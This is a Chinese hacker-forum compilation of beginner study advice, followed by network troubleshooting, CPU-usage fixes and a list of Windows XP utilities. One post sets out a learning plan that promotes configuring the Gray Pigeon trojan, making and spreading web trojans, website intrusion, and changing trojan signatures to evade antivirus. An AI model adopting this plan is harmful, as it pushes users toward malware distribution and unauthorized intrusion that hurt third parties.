黑客网络文章整理

从Python开始
Java也是好的入门语言
要做一些重要的编程工作，你将不得不学习C语言
 Perl实用，值得一学
LISP值得学习
实际上你最好五种都会（Python，Java，C/C++，Perl和LISP）
要作到 （一）读代码及（二）写代码
要学会如何写HTML
如果你不懂实用性的英语，学习吧
问：我该从那种语言学起？
答：HTML——如果你还不懂的话

这是我从别的地方看到的，黑客速成学习法，由于适合我们教程太少了，目前我还没找到很好的教程，高手要是看到这个贴回能发些教程以便我们菜鸟能快速的学好黑客，谢谢了！

随着INOKER客非客联盟的再次出台，我想有必要建立这么一个面版每天教一些菜鸟教程，在学习之前你首先必须完整的读完我写的这篇文章。论坛现在新加了一个” 每天一个超级菜鸟教程”和“每天一个不太难的问题”这些都是为你们准备的，好了现在开始说说正题：

或许你并不想成为一个黑客而是好奇，或许你只是为了高超的技术。无论是什么都需要刻苦的去学习，没有什么事情是不付出努力就能轻易成功的，之所以叫成功是因为那个人拥有着与众不同的本领，如果你想拥有超群的本领就要不断的去学习，而学习也要讲究一定的效率。今天inoker的这个开始也正式我作为一个站长所要为他付出的努力，我知道一个人支撑起一个站很难，不过当我撑到不难的时候我知道我的曰子会很好过。

先来说说很多朋友们的烦恼，是不是每次进一个论坛或者在百度搜索一篇菜鸟文章都要很费劲的来读，甚至看到几行便没有信心在读下去，因为什么？因为读不懂。原有的充满好奇的那种信心也随之逝去了。最后因为难以继续学习下去而放弃了黑客。

我曾经有过深深的体会。好比一条狭窄的小路，当你选择工具的时候就必须考虑是自行车 汽车还是路行，选择好的方法才能得到一条捷径。下面我把大致的一条菜鸟路告诉给大家，也是我几年来东一条路西一条路走出来的捷径，希望对你们能有所帮助。但要记得，不付出努力即使一米长的小路，你不迈腿一样是一事无成，要想学就得做好下苦心的准备，不是说你今天按照别人做好的动画跟着去做刷到了几个ＱＢ就说明你是个黑客了，你内心的喜悦如果可以唤醒对黑客技术的兴趣，那还是值得的。一句话，我希望你走下去。

自己一定要对自己有个计划。不能今天上午学学黑客有兴趣了下午又对游戏有兴趣了。学到的知识相当与没学，学东西一定要有总体上的安排。我哪天哪天要计划学什么。预计多少天掌握熟练。这些在你学之前一定要想。我们提倡一种分类的学习方法，下面我说说分类学习的基本内容。前几天看见网安的这个分类学习路线我想在这里在补充点。

1.黑客术语基础：主要把一些常用黑客术语搞清楚,比如什么叫webshell什么叫注入,什么叫旁注,还有一些常用工具的功能,比如nc,sc等等.还有就是当你遇到一个不明白的黑客术语时就应该首先搞清楚这个术语的意思，到百度或者GOOGLE先查好了他的意思。在进行学习，不可以朦胧的去接触不懂的知识。要先搞清楚。(学习一个星期)

2.灰鸽子配置与使用：通过学习要达到正确配置灰鸽子并能正常上线.对它的功能进行操作训练.(学习二天)这个不用说了，灰鸽子大家都知道黑客必须得接触了解的东西。

3.网页木马制作与传播(一个星期)

4.网站入侵(差不多一个月)

5.木马特征码修改(四五天)

当然知识块的划分与学习时间,可根据自己身情况进行适当选择.

下面我把分类学习法过程,技巧,并结合自己在实际学习中以实例形式讲解这种学习方法的具体步骤.

分类学习法的主线:

收集资料----看动画教程与技术文章----实战训练----回过头再看教程与文章---自己制作动画教程与写文章.

按照上面的路线反复练习我想你一定会在很短的时间内有很大的提升。

下面对各个环节进行讲解:

一.收集资料

这个环节,主要目的是收集到尽量多的某类知识块的相关动画教程和技术文章.收集方

法主要有两种方法:第一种,利用百度,google,搜索.比如我想找网站入侵相关教程,可

以在百度google中输入关键字"网站入侵+空格+教程",这样就可以收集大量教程和文

章,可以灵活变化关键字,比如输入脚本入侵+空格+动画,ASP入侵等等,可以搜到大量

网站入侵方面的资料.统统把它们收集整理起来.第二种,利用大型黑客网站的站内搜

索功能.这种搜索比百度和google命中率要高的多.比如你想找网页木马相关教程,你

可以到各大黑客网站.在站内搜索内输入关键字网页木马.

二.看动画教程与技术文章

在看之前,你要准备一个笔记本,专门用来记录在看动画或文章时,不明白的或疑惑

的地方,在看的过程中,你可能有些地方看不明白,没关系,把不懂的地方记录下来,当

然看动画

与文章时要注意以下几点:

1.要深刻理解动画教程整体思路.

2.注意观察动画的每个操作细节,一有不清楚的就要马上记录.那如何解决记录着不懂的地方呢?通过以下几种方法解决.

1.论坛提问:比如菜鸟提问专区,把你遇到的不明白地方描述清楚,发到论坛上,当然你还可以到其它的黑客论坛提问.

2.向黑客群或朋友请教,这里你要多加几个黑客技术群,多交几个要好的黑客技术爱好者,然后,把你的疑难问题拿出来与大家一起讨论,一般也能解决.

3.反复看动画教程,技术文章,有时候,我们看一遍可能不能理解，但反复的看，反复的思考，往往都能解开动画或文章中的疑难问题。

4.用百度，google搜索相关内容，同样利用关键字进行搜索相关内容。这种方法还是不错的，在你搞懂了你的疑难问题的同时也搞懂了N个其它相关问题。

  三.实战训练

这一阶段也是最重要的，刚开始你可以按照动画步骤来操作，很多疑难问题在实

际操作才能真正体会到，同时在操作中也会得到解决。当然你在操作过程中遇到困难

还可以回过头再看动画，并一直反复这个过程。慢慢的就会变成自己的技术。

 

  四.回过头再看动画与文章

在操作过程中，遇到的疑难问题，然后我们带着这些问题回过头来看动画，相信

理解的更深刻了。目的也更明确了。在这个过程中特别要注意在你操作的每个细节与

动画中的细节作对比，发现存在问题的地方及时纠正。

 

五.自己制作动画或写文章

经过一段时间的学习，你可能对某个知识块也有较深的理解，也有自己的见解，

所谓熟能生巧，熟练了自然而然也有个人的心得体会。这时候，你可以把你的新的入

侵思路和技巧做成动画或写成文章呀，这不但提高了你的思维能力同时也锻炼了你的

实际操作水平。这也是提高黑客技术水平的一个重要方法。

所以我在这里建议：若你有新的入侵思路或新的入侵技巧，不要埋在心里，做成动

画。你会在不知不觉中进步。

以上就是我个人认为效果不错的黑客学习方法，当然还结合了以下四个方面的技巧。

一.做黑客笔记

1.记录实战入侵过程中的疑惑问题

2.在看别人动画或文章时，不明白或不理解的地方也记录下来。

3.同时，在学习过程中，遇到的入侵小技巧，入侵常用命令，优秀黑客工具，经典方

法也一一记录下来。以后入侵或遇到难题时，随时都可以拿来查看。

二.收集整理优秀文章，动画教程，黑客工具。

1.分类整理优秀的技术文章。

2.收集整理经典的有技术含量的动画教程

3.收集经典的优秀的黑客工具，大家都应该有自己的黑客工具箱，并分类整理存放好。

收集整理的目的是方便以后的学习。

三.在看别人动画或文章时应该思考的问题。

1.领会动画整体思路。

2.记下不明的或疑惑的细节。

3.评价别人的动画，有何缺点，有何优点，学会分析和思考。同时要敢于提出自己的

想法，如何才能进一步完美他的入侵方法。

 

四.勤做动画

这里做动画的好处，我不多说了，只要你做多了，自然而然就会体会到其中的好处！

只要具备以下条件的，都可以做成动画，我想，也是你掌握技术的最好方法，所以这

也是行之有效的提高黑客技术的好方法。

1.看到好的文章就应做成动画：

 

2.好的工具，经典工具的使用也做成动画：

 

3.入侵总结：

之前我看到很多人做过木马传播的方法，也看过相关木马传播的文章，不过都比较零

散，后来我又参考了相关杂志后就制作了木马传播的综合教程----木马传播终级大套

餐。

4.新思路新技巧：

如果你有好的入侵思路或方法，也可做个动画.

5.拓展，延伸别人的动画：

主要是看了别人做的入侵动画,给你带来的新的入侵方法和技巧.

6.改善完美别人的动画：

 

从以上可以看出，我们要做的教程，尽量不要重复别人的教程，要有自己的创意

和想法。所以，大家可以参考以上方法进行做动画，同时在看别人教程时，不要一味

的照抄照搬，要有自己的见解，要学会思考，要善于总结，在看别人教程时还要不停

的反问自己，能进一步入侵吗？他的这种入侵方法有什么缺点吗？能进一步完善他的

入侵方法吗？只要你做到以上几点，我相信，你的技术也会突飞猛进的。

在这里，提醒那些初次接触黑客技术的菜鸟朋友，不要及于求成，端正好自己的

学习态度，规划好自己的学习计划，寻找适合自己的学习方法，多思考，多实践操作

，再加上一个好的学习环境，你的成功不再遥远!

 

 

一:写在前面   
许多刚入门的菜鸟都在为找不到好的学习方法而苦恼，处处受到阻碍，不但使自己越来越没有信心而且还耽误了宝贵的学习时间
作了许多没有用的事，到最后还是毫无收获。
今天为大家总结一些我个人的学习方法还在网上整理了一些学习方法和必备的知识，希望能对读者们帮助，让菜鸟少走些弯路。

二:学习方法
1 利用搜索引擎
这是一种高效的学习方法，相信每个高手都从这里受益匪浅，这也是菜鸟最好的老师，她随叫随到，言听即从，力量强大。强烈建议大家在遇到问题前，先请教一下www.Google.com

1）公共搜索引擎
比如大名鼎鼎的Google，还有百度等。利用这类搜索引擎，你几乎可以搜到任何你想要的东西，比如：文章，教程，软件，安全站点，安全论坛，一切的一切。
所以以后不要再问诸如3389是什么端口（去搜一下3389+空格+端口+空格+漏洞）；流光在哪里下载（去搜流光+空格+工具+空格+下载）；ipc$怎样利用（去搜ipc$Content$空格+入侵+空格+教程）等完全可以向搜索引擎请教的问题，如果你非要问一下，没关系，你会得到简单明了的答案：‘去搜！！’请不要埋怨这位高手不耐心，面对千百个这样的菜鸟问题，他这么做已经很人道了。
因此可以看出，掌握良好的学习技巧对菜鸟来说是多莫重要，不少菜鸟就是因为像这样到处碰壁后，最终放弃了hack学习。
*不会利用搜索引擎对菜鸟来说是致命的，你将举步为艰，反之，你将进步神速。

2）站点内部/论坛的搜索引擎
使用方法上大同小异，比如你现在需要一篇教程或是一个hack软件，而你又觉得google上搜出来的东西太杂或觉得没有专业性，那么这时候你就可以到各大安全站点或论坛上去搜索，比如红客联盟,小榕的论坛，当然还有我们的论坛www.nohack.cn/bbs，在这些站点的内部引擎里搜到的教程或软件，一般都是比较有保证的。
*如果你是一只想飞的菜鸟，那么就学着去搜索吧。

2 阅读书籍
hack学习中，书籍是必不可少的，这个我不用多少，只是希望大家能有选择的购买书籍，找到最适合自己的那一种。

1）基础知识类：一般来说菜鸟的基础是比较差的，甚至一些基本常识都不知道，因此有几本基础知识的书作为参考是必不可少的，比如关于TCP/IP,网络，操作系统，局域网等，甚至是关于DOS,windows基础的书都是很有必要的。在读书的过程中，你一定会遇到许多不懂的名字或术语，该怎么办呢？白学了？？去搜索吧！！
注意：此类书籍关键在于它的通俗易懂性，不要追求多莫深入，对菜鸟来说，急于求成是最要不得的。因为我还是学生，因此学校的图书馆是很好的书源（主要是免费），我几乎借遍了所有hack方面书籍，如果你已经不是学生，建议你到各大图书馆去借，因为这样要比买书不知省多少钱。
*菜鸟准备2-4本即可

2）大众杂志类
此来书籍的精华在于它的合订本，比如电脑报合订本，电脑应用文萃合订本等等，就相当于一个大百科，分类详细，内容丰富，每年买上一两本就足够了，你会从中受益匪浅。
注意：此类书籍的优势在于内容全面，各个方面都能涉及到，查找方便，但因其定位在大众杂志，内容相对比较基础，适合菜鸟做全方位了解。
*菜鸟准备1-2本即可

3）hack杂志类
比如《黑客手册》和相关的杂志等，此类杂志专业性强，内容由浅入深，讨论详细，并附送光盘，对比较富裕的朋友来说是个不错的选择，当然，你也可以到网上找一些电子版，下载观看。
注意：这是一种比较好的入门方法，许多朋友都是在无意中买了此类杂志后，才开始对hack技术感兴趣的。
*菜鸟不定期购买即可，如果你经济确实不富裕，可以放弃，或找电子版观看

3 察看教程
教程大部分发布于网上，你可以到各大安全站点的文章系统中去找，或者去相关论坛或Google搜索。这是一种令人兴奋的学习方法，一篇好的教程能让你进步飞快，如果你能找到一些专业而又详细的教程，你的hack学习将会事半功倍，因为教程比书籍读起来更亲切，而且语言通俗易懂，寻找方便（如果是书籍，那要买多少本啊），而且他最大的特点在于百家争鸣，对于同一个问题可能有很多的教程，你可以一一观看，从中总结出最精华的部分。
注意：由于任何人都可以发布教程（当然，好的安全站点是有验证机制的），所以一些个别教程并不能保证其正确性，或者不能保证在任何情况下都具有正确性，因此在阅读时要有所取舍。还有，一些老的教程其内容或所涉及软件可能不再适用，请大家注意这点。
另外，现在比较流行动画教程，这种教程的优点在于直观，对菜鸟中的菜鸟帮助很大（许多菜鸟只看的懂动画教程），但我个人更倾向于文字教程，原因：连文字教程都看不懂，还做什么hacker,看动画教程只会让你越来越懒，而不愿再去思考（个人观点）。当然，有些文字教程写得的确很烂，读了以后让人更晕。
*这是菜鸟必须掌握而且要会灵活运用的学习方法

4 在论坛上学习/交流
论坛是菜鸟成长必不可少的基石，如果你能找到一个管理严格，技术含量高，充满活力的论坛，那么我真的要祝贺你，因为你将在这个论坛中学到许多许多东西。那么如何使用一个论坛呢？如下：
1）留意精华版：这是一个论坛的精华所在，所有一级棒的帖子几乎都在这里了，慢慢的读吧，你会收获很多。
2）提问前先搜索：这是许多菜鸟忽略的问题，如果你不注意，将浪费你很多时间，原因是这样的：菜鸟一般所提的问题就那么几十个，在一个稍微老一些的论坛上基本上应该都有人提过了，而且是不止一次的提过了，因此你事先搜索一下，应该会搜到不止一篇的帖子，在这些帖子的回复中，应该有你想要的答案，但如果你不去搜索而直接提问，那么你将花费一定的时间去等待回复，这就是浪费，况且大部分高手都反感提问简单而重复的问题，那么你得到的回复也许将更加粗略而潦草，这更是浪费。所以，在提问前恳请你,现搜索一下问题吧！！
3）关注高手的帖子：一个论坛上一定会有几位高手，比如版主之类（至于怎么判定一个高手，就不用我多说了吧），他们的回复不但精彩，他们所发的帖子更值得关注，而这是大家常常忽略的问题，所以，在论坛上你可以试着搜一下这位高手的用户名，那么他所有的帖子将展现在你面前，仔细看看吧，高手的帖子就是不一样吧。
4）热点的帖子：一般体现在回复率上，这类帖子并不一定是关于技术的，但他一定是人们现在最关心的（否则哪里会有那么多回复），多看看这类帖子，你将获得更丰富的知识。
5）高效的提问：对于同样的一个问题，不同的提问方式，将会受到不同的效果，能得到你最想要得答案，就是高效的提问。那么如何高效的提问呢？

（1）帖子标题写清楚：像‘快来救我呀’‘谁知道为什么’‘高手请进’这类的帖子，我是很少光顾的，一个好的标题要能概括帖子的主要内容；
（2）内容尽量详细：原因很简单，连问题都说不清楚，谁会帮你，谁能帮你（神仙？？）；要说明问题出现的环境，不同的环境会有不同的结果；
（3）提问前作最大的努力：请确认你在提问前已经尽了最大努力，但还是没有效果。如果你打算提一些懒人的问题，比如‘我找不到流光的下载，请高手发到我的邮箱好吗’‘谁会net命令呀，教我’，那么所有人将会鄙视你，很难想象懒汉当了hacker会是什么样子；
（4）感谢帮助你的人：这是最起码的作人礼仪。

6）融入论坛：在你的能力范围内，给予他人最大的帮助。
*论坛对菜鸟就像空气一样重要，去找一个适合你的论坛吧。

5 与高手直接交流
这也许是最最高效的学习方法了，能与高手直接交流是一件多么美妙的事情阿，但如果使用不当，也会给自己和对方带来许多不快。
1）如果你与这位高手认识甚至是好朋友，那问题很好办，尽情的提问吧，只要不是很过分就行；
2）如果你与这位高手素昧平生，那还是谨慎一点，不要一股脑提许多问题，因为大家得时间都是宝贵的，他不可能花许多时间来专为你一个人服务，因此建议你慢慢来，每次提1－2个问题就好，因为还有下次嘛！
3）不要轻易打扰别人，以下方式请慎用：oicq,mail,homephone,
4）要尊重对方，不要过于奢求，在这个功利的社会，要学会被拒绝，再说人家也没有义务必需要给你解答问题。
*能得到高手的帮助当然最好，如果没有路子，也不要强求，相信你自己也能行。

三 具体切入点

写到这里了，一些菜鸟说仍然找不到切入点，不知道该从何入手，说哪里都不明白，看什么都看不懂，无法入门。也难怪，菜鸟嘛，的确很难入手，有些朋友就是因为前期的学习很吃力才放弃了的，那么好，我就继续介绍我本人的两个方法吧。

1基础书籍法：既然基础差，那么就从基础开始，去买一至两本hack方面的既基础又全面的书籍来看，比如《黑客就这么几招》等等，此类书籍比较基础，但又很全面，黑客初期的基本攻击方法都有介绍，以此类书为基础慢慢的学习，过一段时间你会发现你已经入门了；

2教程解惑法：就是说一旦遇到不明白的地方就通过搜索引擎，资料，教程来解答，在求解的过程中，你一定还会关联的遇到其他不懂的新问题，那么好，继续找资料看教程，就这样一直连续不断，遇到不懂的就去看，不管他是哪方面的，慢慢的，你所懂的会越来越多，你会发现你已经入门了。此类方法有很大的随意性，不是很系统，但灵活自由，高效；

3结合法：就是将以上两种方法结合，这是很好的一种方法，建议大家使用。

四 总结

以上基本上是我个人的一面之谈，难免主观一些，请海涵。如果你还有什么好的学习方法，请一定要告诉我，我会收入到这片帖子当中，希望她能对菜鸟们有所帮助。

网络必备知识

（一）.网卡安装故障检查方法
　　如果无法安装网卡驱动程序或安装网卡后无法登录网络，请按下述步骤检查处理:

　　1.选择“控制面板”/“系统”图标，打开“系统属性”窗口；

　　2.在“系统属性”窗口的“设备管理”标签的“按类型查看设备列表”中，双击“网络适配器”条目前的“+”号将其展开，其下应当列出当前网卡；

　　3.如果“设备管理”标签中没有“网络适配器”条目或当前网卡前有一“X”号，说明系统没能识别网卡，可能产生的原因有网卡驱动程序安装不当、网卡硬件安装不当、网卡硬件故障等等；

　　4.如果网卡前有一带圆圈的“！”，说明系统找到了网卡，但网卡不能正常工作，请选定网卡后按“属性”按钮，打开“网卡属性”单；

　　5.如果网卡不能正常工作，在“网卡属性”窗口“常规”标签的“设备状态”栏目中会给出故障类型和推荐的解决方法；如果存在资源冲突，在“资源”标签中的“冲突设备列表”中通常会给出与网卡发生冲突的设备以及冲突的IRQ中断号或I/O地址。对有些PCI网卡，用上述方法无法检查到资源冲突，可选择“开始”/“程序”/“附件”/“系统工具”/“系统信息”打开“Microsoft系统信息”窗口，双击左边窗口“系统信息”框中“硬件资源”条目前的“+”号将其展开后，能检查到资源冲突。

（二）.网卡设置资源冲突处理方法

　　网卡非常容易与其它设备发生资源冲突，尤其是在系统中安装有多只接口卡的情况下，资源冲突常采用以下几种方法处理。

　　方法一:在上述“网卡属性”窗口“资源”标签的“资源类型”列表中选定发生冲突的“资源”，按“更改设置”按钮，更改发生冲突的IRQ中断号或I/O地址；

　　方法二:早期网卡常强行占用IRQ3，与COM2发生IRQ中断冲突，如果用户不使用COM2，可在BIOS中将“Onboard UART Port”项设置为Disabled，关闭COM2；

　　方法三:有些PCI网卡会强行占用IRQ10，与一些强行占用IRQ10的显示卡发生IRQ中断冲突，可在BIOS中将“Assign IRQ For VGA”项设置为Disabled，不给显示卡分配固定的中断；

　　方法四:运行网卡程序软盘中的设置程序，将网卡设置为非PNP模式（jumpless）,设置IRQ中断号和I/O地址为系统未占用的地址；并在BIOS中将相应中断号由PCI/ISA改为Legacy ISA；

　　方法五:升级网卡BIOS，这种方法要求网卡使用的是Flash ROM，还需要去相应网站下截高版本网卡BIOS更新程序。如果用户采用上述方法均不能解决故障，建议您换一块网卡试试。

(三)在“网上邻居”中除了“整个网络”，什么也没有，点击“整个网络”，告诉你无法浏览。

　 　查找以下各项：

　　a.是否正确安装IPX/SPX协议，协议是否与网卡绑定。至于NetBEUI，我认为对于用Hub连起来的网，装不装不大重要。

　　b.是否正确安装“Microsoft 网络客户”。

　　c.要至少看到自己，应安装“文件与打印机共享”。

　　d.有固定IP的（前提是TCP/IP协议已装），保证网内所有机子的IP前三段相同，子网掩码为255.255.255.0。没有的，使工作组名字相同。

　　e.启动时问你网络登陆用户和密码时最好不要按“Esc”。

　　f.五类线的问题，有条件的用查线器查一下，没条件的换一条线，或换一个Hub口看一下。

　　g.98内部的问题，如果所有设置都和别人一样，网线插到别人的机子上也能用，就要考虑重装系统了

CPU占用100%解决办法

一般情况下cpu占了100%的话我们的电脑总会慢下来，而很多时候我们是可以通过做一点点的改动就可以解决，而不必问那些大虾了。

当机器慢下来的时候，首先我们想到的当然是任务管理器了，看看到底是哪个程序占了较搞的比例，如果是某个大程序那还可以原谅，在关闭该程序后只要cpu正常了那就没问题；如果不是，那你就要看看是什么程序了，当你查不出这个进程是什么的时候就去google或者baidu搜。有时只结束是没用的，在xp下我们可以结合msconfig里的启动项，把一些不用的项给关掉。在2000下可以去下个winpatrol来用。
一些常用的软件，比如浏览器占用了很搞的cpu，那么就要升级该软件或者干脆用别的同类软件代替，有时软件和系统会有点不兼容，当然我们可以试下xp系统下给我们的那个兼容项，右键点该.exe文件选兼容性。

svchost.exe有时是比较头痛的，当你看到你的某个svchost.exe占用很大cpu时你可以去下个aports或者fport来检查其对应的程序路径，也就是什么东西在掉用这个svchost.exe，如果不是c:/windows/system32(xp)或c:/winnt/system32(2000)下的，那就可疑。升级杀毒软件杀毒吧。

右击文件导致100%的cpu占用我们也会遇到，有时点右键停顿可能就是这个问题了。官方的解释：先点左键选中，再右键（不是很理解）。非官方：通过在桌面点右键-属性-外观-效果，取消”为菜单和工具提示使用下列过度效果(U)“来解决。还有某些杀毒软件对文件的监控也会有所影响，可以关闭杀毒软件的文件监控；还有就是对网页，插件，邮件的监控也是同样的道理。

一些驱动程序有时也可能出现这样的现象，最好是选择微软认证的或者是官方发布的驱动来装，有时可以适当的升级驱动，不过记得最新的不是最好的。

cpu降温软件，由于软件在运行时会利用所以的cpu空闲时间来进行降温，但windows不能分辨普通的cpu占用和降温软件的降温指令之间的区别，因此cpu始终显示100%，这个就不必担心了，不影响正常的系统运行。

在处理较大的word文件时由于word的拼写和语法检查会使得cpu累，只要打开word的工具-选项-拼写和语法把”检查拼写和检查语法“勾去掉。

单击avi视频文件后cpu占用率高是因为系统要先扫描该文件，并检查文件所有部分，并建立索引；解决办法：右击保存视频文件的文件夹-属性-常规-高级，去掉为了快速搜索，允许索引服务编制该文件夹的索引的勾。

隐藏在XP的28个秘密武器

Windows XP现在大家都在用了，不过，隐藏在它其中的秘密武器可不是人人都找得到，下面就让我带大家来寻找Win XP中的28个秘密武器。

1、免费的系统教程（system32文件夹下）
安装完windows xp后很想马上学习并体验一下它的魅力吗？我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“ 漫游windows xp”，就会出现界面，它将引导我们游历windows xp的新功能。
　　
小提示：windows xp中自带的教程非常形象，是图形界面的，而且制作得相当精美，微软的权威性可想而知。如果你的“开始”菜单上没有“漫游windows xp”项目，则可以运行c:＼windows＼system32＼tourstart.exe进入。

2、辅助功能向导——Accwiz（system32文件夹下）
我们知道，微软在windows中为残疾人士提供了辅助功能，使他们也能xx作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的windows，使残疾人士能根据自身情况更好地使用windows。
　　
3、字符映射表——Charmap（system32文件夹）
是不是觉得word的“插入符号”功能非常方便？我们在其他windows程序中也常常要插入一些特殊符号，而一个个地找又麻烦，这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符，选中后单击“选定”和“复制”按钮，即可把选定字符复制到windows剪贴板中，供字处理软件粘贴使用。
　　
小提示：用它来复制特殊字体中的特殊符号特别有用。

4、仓颉拼音输入法——Cintsetp(system32＼ime＼cintlgnt文件夹下)
微软新仓颉输入法98b的安装程序，微软把它放在简体中文版windows xp中，但埋藏得较深。不过它很有用，安装后就会在windows中新增一个“中文（台湾）”的仓颉输入法，利用它可以在简体中文windows xp上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人提供了方便。

5、磁盘清理大师——Cleanmgr（system32文件夹下）
尽管现在的硬盘越来越大，但它总有容量的限制。在你不经意地安装这个或那个软件的过程中，可能会因为硬盘空间已频频告急而影响了正常windows程序的执行。不要急，请打开此程序，它会自动地释放出一部分硬盘空间，并会智能化地进行删除xx作，保证你的系统万无一失。这比从资源管理器中删除要安全多了。
　　
6、剪贴板查看器——Clipbrd（system32文件夹下）
windows剪贴板为我们在各个windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。windows xp中的剪贴板查看器程序较原先windows 9x/me的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。

7、控制面板启动器——Control.exe（system32文件夹下）
控制面板是windows的一个重要组成部分，许多设置都通过他完成。而双击这个文件就是最快打开系统控制面板的方法，可省去从“开始”菜单上层层点击的麻烦。
　　
8、Windows xp的诊断医生——Drwtsn32（system32文件夹下）
drwtsn32是一个程序错误调试器。drwatson程序会获得并记录运行windows的计算机上的程序错误的信息。只要检测到错误，就会创建一个文本文件drwtsn32.log)，提供错误原因的详细说明，并给出解决问题的建议性xx作，在与microsoft技术支持联系并请求帮助时，drwatson将会起到很大作用。

9、DVD播放器——Dvdplay（system32文件夹下）
随着dvd驱动器和dvd光盘价格的下降，在普通家庭电脑上配置一个dvd播放器已不是一件奢侈的事情。而要播放dvd需要播放器的支持，windows xp提供了一个“免费”的dvd播放器，有了它我们可以省去一笔购买第三方dvd播放软件的费用。

10、自解压文件制作工具——Iexpress（system32文件夹下）
用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用iexpress可制作两种自解压文件，一种是标准自解压文件（standard
self-extractor），另一种是安装程序式自解压文件（self-extractor for
software installation），这样我们在发布程序时就方便多了。另外大家要注意，尽管使用iexpress的运行界面是英文的，但利用它生成的自解压文件却是中文的，省去了繁琐的本地化工作。
　　
11、文件转移向导——Migwiz（system32＼usmt文件夹下）
windows系统的易用性总是和不稳定性共存的，因此在系统健康之时把当前设置保存下来，供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移向导”程序上。通过它，我们就可以实现系统状态的备份与恢复。
　　
12、系统配置程序——Msconfig（windows＼pchealth＼helpctr＼binaries文件夹下）和windows中的系统配置程序一样，通过这个程序，我们可对系统的一般、system.ini、win.ini、boot.ini、服务和启动项目进行修改。
　　
小提示：用它来去除系统自启动程序特别有效。

13、备份工具——Ntbackup（system32文件夹下）
数据是计算机中最为宝贵的资料，因此经常备份你的资料也应该成为一个好习惯。现在许多人都寻求第三方的备份工具，其实大可不必。使用windows xp中内置的备份工具就可以非常方便地将资料进行备份，而且由于你使用的是微软产品，所以根本不存在兼容性问题。
　
14、ODBC数据源管理器——Odbcad32（system32文件夹下）
在windows中访问odbc数据源必须要有其驱动程序，该工具可以查看在windows中已安装的驱动程序及相关信息。

15、对象包装程序——Packager（system32文件夹下）
通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般windows程序中使用，可用于制作计算机类教学课件或文档。
　　
16、注册表编辑器增强版——Regedit32（system32文件夹下）
注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运行的信息。在windows xp中有一个名为regedit的程序，可编辑注册表，但此程序却是它的增强版本，除可编辑注册表外，还可设置权限、清除重复项、删除已被卸载或删除的程序项等高级xx作。
　　
17、Activex注册和反注册工具——Regsvr32
使用过activex的人都知道，activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在windows的system文件夹下有一个regsvr32.exe的程序，它就是windows自带的activex注册和反注册工具。它的用法为：“regsvr32 [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。

参数有如下意义：
/u——反注册控件
/s——不管注册成功与否，均不显示提示框
/c——控制台输出
/i——跳过控件的选项进行安装（与注册不同）
/n——不注册控件，此选项必须与/i选项一起使用
如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32 /u amovie.ocx就行了。

18、动态链接库函数启动器——Rundll32
在windows中使用了许多动态链接库，这样就使得所有windows程序都可共享这些动态链接库中的函数。一般情况下，许多应用程序都通过windows api来xx作这些函数，但归根结底是通过windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是：“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，命令行为“rundll32.exe user.exe,exitwindows”，并设置其快捷键为f4即可。再如，笔者要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,control_rundll”即可，要打开桌面属性，只需要使用“rundll32.exe shell32.dll,control_rundll desk.cpl”，其余的以此类推。

19、系统文件检查器——Sfc（system32文件夹下）
使用windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器sfc.exe，一切都会变得非常简单。
　　
20、共享文件夹设置工具——Shrpubw（system32文件夹下）
同一工作组的同事在一起工作，有时必须与同事们共享文件夹，这时我们可以利用此工具轻松搞定。它的作用与右击一文件夹，选择“共享”基本上等价。
　　
21、Microsoft 签字验证工具——Sigverif（system32文件夹下）
所谓“签署的文件”，就是被授予microsoft数字签署的文件。该签署表明，该文件是原始文件的一模一样的副本。通过microsoft签字验证工具，我们可在计算机上查找已签署和未签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。使用起来非常方便，和查找窗口几乎没有什么不同，只要给出搜索范围，就可搜索出指定范围内的已签署文件和未签署文件。

22音量控制程序——Sndvol32
我们在windows任务栏上可见到一个可爱的小喇叭，当我们双击它时就会弹出音量控制面板，其实这时我们就是启动了一个windows文件夹下的sndvol32.exe文件。不信，请你进入windows文件夹，再打开sndvol32.exe文件看看，熟悉的“音量控制”面板是否已经在你眼前了？另外还要告诉大家，它还有一个隐藏的参数“/r”，利用此参数可快速地打开录音控制面板，这样我们只要在桌面上建立一指向c:＼windows＼sndvol32.exe的快捷方式，并令它的参数为/r（即在目标中填入“c:＼windows＼sndvol32.exe /r”），就可以快速打开录音控制面板选择输入设备了。如果设备过多，在面板上容纳不下时，试着按“ctrl+s”键，不管有多少设备都能够完全显示。

23、任务管理器——Taskmgr（system32文件夹下）
任务管理器提供正在你的计算机上运行的程序和进程的相关信息，使用任务管理器可快速查看正在运行的程序的状态，或终止已停止响应的程序。也可使用多达15个的参数评估正在运行的进程的活动，以及查看cpu和内存使用情况的图形和数据。当计算机发生锁死时使用它最方便和有效。

24、远程连接程序——Telnet（system32文件夹下）
在internet上有无数的计算机，而要访问它们都必须通过建立远程连接才行，进行两个计算机的远程连接可用专门软件实现，但通过windows自带的远程连接程序telnet.exe也能完成这一xx作，而且它还是纯中文界面软件。

25、远程FTP工具——Tftp（system32文件夹下）
ftp是一个网络传输的协议，通过这个程序可非常方便地连接到对方的服务器上进行文件的存取xx作，省得再找如第三方的ftp软件了，可惜的是它是字符界面。
　　
